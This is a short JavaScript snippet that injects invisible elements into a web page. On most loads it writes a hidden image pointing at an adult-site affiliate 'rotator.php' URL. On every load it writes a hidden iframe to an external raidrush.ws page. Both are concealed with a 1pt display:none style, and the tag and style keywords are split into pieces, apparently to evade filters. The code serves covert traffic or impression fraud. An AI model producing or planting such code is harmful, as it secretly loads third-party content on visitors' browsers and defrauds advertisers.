
function GetRandom( min, max ) {if( min > max ) {  return( -1 );}if( min == max ) {return( min );}
return( min + parseInt( Math.random() * ( max-min+1 ) ) );}


function draw_pr(){
var x = GetRandom(1,50);
	if(x<45){
	var url = 'http://online.mydirtyhobby.com/rotator.php?an=rrush&pn=pu';
	document.write('<img src="' + url + '" border="0" class="hid" /> ');
	}
	document.write('<ifra' + 'me src="http://raidrush.ws/pr.html" frameborder="0" class="hid"></ifra' + 'me>');
}

document.write('<style type="text/css">.hid {disp' + 'lay:none;width:1pt;height:1pt;z-index:-99;}</style>');
draw_pr();